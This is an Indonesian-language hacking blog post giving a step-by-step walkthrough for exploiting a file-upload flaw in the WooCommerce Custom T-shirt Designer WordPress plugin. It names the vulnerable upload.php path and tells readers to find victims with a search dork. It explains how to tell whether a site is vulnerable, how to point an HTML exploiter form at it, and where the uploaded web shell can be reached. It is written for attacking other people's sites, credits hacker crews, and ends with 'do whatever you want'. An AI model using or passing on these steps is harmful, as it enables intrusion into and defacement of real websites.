Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability.
langsung saja. siapkan bahan-bahanya.
HTML Exploiter:
save dengan format .html , tipe all file.
Vulnerability :
[localhost]/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php
Dork :
use your brain bitch
Shell Location :
[localhost]/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/[randomname].php
Langkah-langkahnya
1. cari target dengan dork kamu.
2. buka site lalu ubah url tambahkan ini di belakangya wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php
contoh: http://www.site.com/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php
Jika muncul tulisan ERROR berati vuln.
NB: error doang, kalau ada error on line blablablalbla itu gak vuln.
3.buka HTML Exploiter diatas dan edit bagian http://127.0.0.1/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php dengan web yang vuln.
save kembali lalu buka lewat browser.
4. Uploud shell kamu lewat situ, Jika sukses kalian akan mendapatkan nama acak. Misal :
1384522165528621b5f41fe.php
5. Maka letak shell kalian ada di
[localhost]/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/[randomname].php
contoh: http://www.site.com/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/1384522165528621b5f41fe.php
6. Shell sudah tertanam selanjutnya terserah mau kamu apain :D
Sumber : Forum IDCA
Thanks to : yuyudhn - Bebyyers404 | JKT48 CYBER TEAM - Black Devil Crew
Support Idiot Attacker dengan klik subscribe di channel Disini, Banyak konten-konten Idiot attacker yg di upload disana.
Next
« Prev Post
« Prev Post
Previous
Next Post »
Next Post »
Subscribe to:
Post Comments (Atom)
0 Komentar